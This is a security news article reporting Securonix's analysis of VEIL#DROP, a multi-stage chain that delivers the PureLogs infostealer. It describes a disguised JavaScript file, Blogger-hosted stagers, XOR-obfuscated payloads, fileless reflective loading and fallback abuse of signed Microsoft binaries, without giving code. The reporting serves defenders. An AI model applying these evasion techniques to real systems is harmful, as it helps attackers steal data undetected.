Cybersecurity researchers have flagged a new multi-stage malware delivery attack chain that uses social engineering and Blogger pages to deliver an information stealer called PureLogs.
The activity has been codenamed VEIL#DROP by Securonix. It’s suspected that the initial payloads are distributed either via spear-phishing or a drive-by compromise, which occurs when an unsuspecting user lands on a website (legitimate or otherwise) under the attacker’s control.
“The infection chain begins with a deceptively named JavaScript file masquerading as a document (e.g., transcript.pdf.js), which executes through Windows Script Host and launches PowerShell with execution policy bypasses enabled,” researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee said in a report shared with The Hacker News.
At a high level, the PowerShell script is responsible for retrieving a next-stage payload hosted on Blogger (“htlwub00klocate.blogspot[.]com”), allowing the attackers to bypass reputation-based defenses by abusing Google’s trusted infrastructure as a stager and to blend in with legitimate web activity.
The downloaded PowerShell payload acts as a conduit for loading a benign web page like Google, creating the impression that a PDF document is opened, while the infection sequence proceeds silently in the background, ultimately leading to the deployment of PureLogs Stealer, a .NET-based infostealer known for harvesting a wide array of sensitive data from compromised hosts.
The PowerShell loader also attempts to ensure unrestricted execution of follow-up PowerShell commands, terminate selected processes such as “wscript.exe” to minimize forensic trail, delete “transcript.pdf.js” to eliminate evidence of execution, and decrypt an embedded payload.
“Following successful XOR decryption, the loader transitions into one of the most evasive components of the VEIL#DROP framework: dynamic stage generation combined with runtime mutation,” Securonix explained. “Rather than using static indicators such as hard-coded URLs or predictable execution patterns, the malware constructs the next-stage payload location dynamically during execution.”
This involves building a unique blogspot[.]com URL for each execution by inserting a random number of forward slashes (“https://thehackernews.com/”) to the URL string so as to bypass static URL signatures, indicator-based blocking, and URL-based filtering mechanisms.
In addition, the decoded script introduces runtime mutation and polymorphism by replacing placeholder values within the script with randomly generated strings and values during execution. This variability is designed to defeat script signatures and file hashes, thereby preventing reliable detection.
The reconstructed script is finally executed entirely in memory without leaving any artifacts on disk. This component functions as a loader responsible for decoding and running the core malware component, which is nothing but a .NET assembly that’s launched using a technique known as reflective code loading.
In the event security controls and other environmental restrictions prevent it from executing the recovered .NET assemblies directly from memory, the loader incorporates a fallback execution method that relies on Microsoft-signed binaries, such as “regsvcs.exe,” “installutil.exe,” “msbuild.exe,” and “aspnet_compiler.exe,” to accomplish the same goals without attracting any attention.
Because these binaries are trusted, signed by Microsoft, and are already present on the system, the living-off-the-land (LotL) approach enables the attackers to make their activity appear legitimate and fly under the radar.
“One of the most notable aspects of the loader is that it does not depend on any single LOLBin,” the researchers pointed out. “Instead, execution follows a cascading model, attempting each method until one succeeds.”
The impact of a stealer infection typically goes beyond the initially compromised endpoint, as the harvested data can act as a stepping stone to burrow deeper into the target environment, establish persistence, perform lateral movement, and even breach its cloud infrastructure.
“The combination of compromised websites, multi-extension masquerading, trusted cloud services, XOR-obfuscated payloads, reflective .NET loading, fileless execution, and LOLBIN abuse demonstrates a deliberate effort to evade traditional antivirus solutions, reduce forensic artifacts, and maintain operational stealth throughout the infection lifecycle,” Securonix said.







